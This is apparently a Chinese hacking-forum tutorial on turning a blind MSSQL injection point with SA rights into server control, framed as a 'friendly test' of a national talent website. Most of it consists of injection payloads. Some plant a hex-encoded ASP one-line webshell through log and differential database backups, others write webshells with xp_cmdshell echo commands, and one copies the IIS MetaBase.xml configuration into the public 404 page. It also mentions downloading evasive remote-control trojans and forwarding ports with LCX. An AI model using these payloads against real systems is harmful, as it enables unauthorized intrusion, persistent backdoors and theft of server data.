sa权限的教程.

admin

————————————————————————九零后安全技术小组 | 90 Security  Team -- 打造90后网安精英团队  ———————————————————————————————
$ F/ d6 h0 t7 ]' i1 ?0 D. M
5 ]& v1 h  L5 a2 u
                                                             欢迎高手访问指导，欢迎新手朋友交流学习。

                                                                 
/ P+ O  y0 y5 t: w' ?( I% Q                                                                 
                                                                  论坛： http://www.90team.net/

* j! s. f- p% a9 J% g8 ]0 m
& |4 R. s4 n* I1 c: B& \
友情检测国家人才网
7 l# w. m! {3 t! Y
* L( D1 A- ^3 Q5 q
1 f+ K: ^( W4 _9 V; z* |  z内容：MSSQL注入SA权限不显错模式下的入侵


; f( j: r5 @3 E9 q一般新手扫到不显错的SA（systemadmin）的注入点时，虽然工具能猜表列目录但还是很麻烦有的人就直接放弃了，今天我给大家演示下如何利用。方法很简单大家看操作。
" p8 _4 i5 w! P
我这里使用的是 火狐的插件提交参数。跟在浏览器里直接提交一样。
* _: J. Z; |4 ~# D

, y: I. U( B+ A( [. D8 w这里的主机环境：MSSQL+JSP 权限为不显错的SA，支持多行执行 xp_cmdshell存活 服务器处于内网，WEB和数据库在同一台服务器上。注意这里服务器操作系统是windows2003，IIS，404页面的默认路径是 C:\Windows\Help\iisHelp\common\404b.htm。
0 q+ `$ K! H1 D0 h. k
思路：

4 {  u- A. ^5 h+ ^" @$ c5 p+ X6 B首先：
; d) K# K: ^: w, ~0 v9 ~( X
& ?0 f: ^/ r9 e通过XP_CMDSHELL 执行命令再将执行结果指向IIS的404页面，然后访问WEB站点的一个不存在的目录得到命令执行结果，刺探服务器信息。
+ R; b& R: H: M: K
1.日志备份获得Webshell
3 B! p. M9 n0 o0 ]+ `' |/ J
' p, v7 O+ U/ M8 }# ]9 S5 C2.数据库差异备份获得Webshell
7 N: M2 p; X) g/ q; u' x
4.直接下载免杀远控木马。

  Y! J( m( r3 A  w( V7 [, S5.直接下载LCX将服务器端口转发出来
8 S2 S8 X. Z, I/ n/ J3 O+ d/ y
# S0 t$ I# q: D* Y: G8 S6.通过XP_CMDSHELL 执行命令读取iis配置文件（C:\Windows\system32\inetsrv\MetaBase.xml ）分析查找WEB站点路径并在CMD下写入转义后的一句话获得WEBSHELL上传LCX将服务器转发出来。
3 f. \; k" h, s( I6 M' v


在这里我就不浪费大家时间了，我已经测试过  日志备份和 数据库差异备份 都没有成功 我就不演示了。  直接下载免杀木马。。这个也不用演示了。 直接在注入点后写入一个 DOWN 的VBS脚本下载就行了，
" o/ q3 |% F' d
" p5 Y+ Q& c) Q我直接演示后面一个方法

% p0 L" m! y  ?5 a" E5 S" Y! V1 K
4 `+ ]& P5 e( s% v+ T3 P4 ]分析查找WEB站点路径并在CMD下写入转义后的一句话获得WEBSHELL
: y5 V" K) F  v- _" b

  v+ L4 ^: {! e
4 V0 q$ s" x2 ~* K% U
◆日志备份：


1. 进行初始备份
; Alter Database TestDB Set Recovery Full Drop Table ttt Create Table ttt (a image) Backup Log TestDB to disk = '<e:\wwwroot\m.asp>' With Init--
7 I* ^0 E4 K, I  x
$ r9 Z9 o3 A$ e- i9 N2. 插入数据
;Insert Into ttt Values(0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E)--

9 A' T% D& K8 `2 h+ \6 X0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E   为 一句话木马 %><%eval(request(chr(97))):response.end%>
* u* ^5 V6 b( |+ }7 r4 Z  
3. 备份并获得文件，删除临时表
) j4 C2 V+ Q5 l; f;Backup Log <数据库名> To Disk = '<e:\wwwroot\m.asp>';Drop Table ttt Alter Database TestDB Set Recovery SIMPLE--

2 z3 u3 `& v0 s; E, z$ ?- w
, o% g2 T: Y$ Y
8 X+ G% K: I0 ~5 H; M( \' s; e◆数据库差异备份
( p( i9 z' \3 I" q% h- d
（1. 进行差异备份准备工作

;Declare @a Sysname;Set @a=db_name();Declare @file VarChar(400);Set @file=<0x633A5C746573742E617370>;Drop Table ttt Create Table ttt(c Image) Backup Database @a To Disk=@file--
7 ~3 q+ a% `# F
上面的 0x633A5C746573742E617370  是 c:\test.asp 路径转换后的16进制编码
9 t3 _. `! I5 V1 `2 q
! _# I+ ]/ g4 E8 V1 K; h$ P
（2. 将数据写入到数据库
! ~7 W3 ~! ?% @/ S;Insert Into ttt Values(0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E)--

0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E   为 一句话木马 %><%eval(request(chr(97))):response.end%>
9 v( ^% D- }" I% e
3. 备份数据库并清理临时文件

9 X4 t$ t2 ~8 ^1 [% |6 Q;Declare @b SysName;Set @b=db_name();Declare @file1 VarChar(400);Set @file1=<0x633A5C746573742E617370>;Backup Database @b To Disk=@file1 With Differential,Format;Drop Table ttt;--
/ k% c9 V( D7 Y& Q0 g8 ^8 N" l
0x633A5C746573742E617370  为 c:\test.asp  删除临时文件
$ V4 K0 J2 ^* R, F/ g


用^转义字符来写ASP(一句话木马)文件的方法:   

1.注入点后执行;exec master.dbo.xp_cmdshell 'echo ^<script language=VBScript runat=server^>execute request^("90"^)^</script^> >c:\mu.asp';--

2.CMD下执行 echo ^<%execute^(request^("l"^)^)%^> >c:\mu.asp
- s  N; W. V5 M% G4 L) U
' i7 |0 s2 @9 e2 V8 u) ^读取IIS配置信息获取web路径

& \! H! b" t0 n! R+ [, C     
     注入点后面执行   ;exec master..xp_cmdshell 'copy C:\Windows\system32\inetsrv\MetaBase.xml C:\Windows\Help\iisHelp\common\404b.htm'--
! L2 z( h/ Y9 `4 }2 b  T$ o
执行命令
     
5 @7 J% B  `0 w; \3 h     注入点后面执行   ;exec master..xp_cmdshell 'ver >C:\Windows\Help\iisHelp\common\404b.htm'--


7 d7 y0 S2 Z2 s; D4 C

6 T; m7 Q, m8 ^7 B& u. W4 e

( _; B$ p2 F% ]* N1 L

" o4 ]5 i% V0 w" m$ Z( Z9 d7 z
4 d# F9 M# \4 _
; f/ s% }" m$ w* B





! e" ~* S2 l2 [


  {% |. ?% k# N7 n5 q; t



; F7 S( E  I' q; B! h; |; k
6 J& J: O) T- X1 u


% x, }/ q' }3 L$ w; B



& \& m2 G$ J/ D. E; S! v
' ^, G# F& R  ~$ A+ }: Z3 o8 Q/ U! K+ l
. ~2 e+ W. t4 V* B+ ]7 G- ]

2 G! ?/ z0 N+ I; [1 G
; T, [, g! I5 m
+ v1 o3 G/ h, t( ?8 Y0 O- Q
% i6 J; F+ G6 A& P




( c  {: [# C; n  O7 U0 n
5 F' F' ^4 H# u& T) P' [' Z

; x7 A% e* a1 @- k

0 V& z9 e6 z1 l( m